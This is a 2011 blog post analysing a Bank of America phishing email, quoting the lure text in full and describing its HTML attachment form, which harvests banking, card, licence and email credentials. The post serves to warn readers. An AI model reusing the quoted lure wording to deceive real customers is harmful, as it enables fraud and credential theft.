Powered by Movable Type 3.121
Home The Book Training Events Tools Stats
Web log archive.
A Dispatch

« Your Netflix Account Has NOT Been Suspended | Main | Mixed Mailbag Morning »

May 17, 2011

Bank of America Phish du Jour

Another day, another phishing campaign attempting to trick Bank of America customers to hand over their identity jewels. Today's sample:

From: Bank of America Alert
Subject: Bank of America Alert: Your Action Is Required (IMPORTANT)

[BofA Logo Image]

Dear Valued Banking Customer,

Bank of America Online has been receiving complaints from our customers for unusual activity of their Online Banking.

This is due to our regular scheduled software upgrade being carried out by our technical department to improve the quality of services for online banking customers.

Due to this, we have sent you an attachment which contains the web page in order to confirm your account information. Download the attachment to your desktop and open the file to Get Started

However, Failure to do so may result in temporary account suspension. Please understand that this is a security measure intended to help protect you and your account.

Thanks for your co-operation.
Online Banking Support Team
------------------------------------
Bank of America, N.A. Member FDIC. Equal Housing Lender
© 2011 Bank of America Corporation. All rights reserved.

The attachment, AccountConfirmation.html, is an HTML file that will, when double-clicked, open inside one's default browser. The page consists of a form with plenty of stolen BofA images (hosted at a hijacked web site), and even includes a lengthy Terms and Conditions statement to which you must agree. I don't know where the thieves got this copy of terms, but it's — how do I say it? — a little old. For instance, the computer requirements verbatim:

For PC using Windows 95, 98, NT, 2000, ME, XP
  • Microsoft Internet Explorer 5.5 or higher
  • Microsoft Internet Explorer with AOL 5.5 or higher
  • Netscape 6.2 and higher (Online Banking is not accessible with
  • Netscape 6.0)
  • Adobe Acrobat Reader 6.0 or higher (not applicable to WA and ID customers)

For Macintosh using OS 9 and OS 10


  • Microsoft Internet Explorer 5.5 or higher
  • Microsoft Internet Explorer with AOL 5.5 or higher
  • Netscape 6.2 and higher (Online Banking is not accessible with Netscape 6.0)
  • Safari 1.0 (for OS 10 only)
  • Adobe Acrobat Reader 6.0 or higher (not applicable to WA and ID customers)

Wow, talk about a trip down memory (and I'm not talking RAM) lane! I think even the crooks' eyes glazed over the terms without checking how current they were.

More troubling, however, is that the form requires input of not only the usual identity data (account info, credit card data, driver's license number, etc.), but also one's email account name and email password. The claim in the form why the email password is needed:

Effective March 21st, All customers benefit of a new Email Protection.

I'd wager that most computer users assign their primary email login credentials to many other sites, including places like amazon, iTunes, and other shopping sites. It's a very dangerous practice, but we all know it happens among users who are not as security conscious as most readers of this blog. You can rest assured that anyone who falls for this phony form and submits true data will have those login credentials fired at all kinds of sites in search of successful logins and further compromises of their accounts.

While the amount of spam hitting my incoming server has been down in the past few weeks, I haven't seen much reduction of criminal phishing activity. The crooks wouldn't keep doing it if it didn't work to some degree.

Posted on May 17, 2011 at 11:27 AM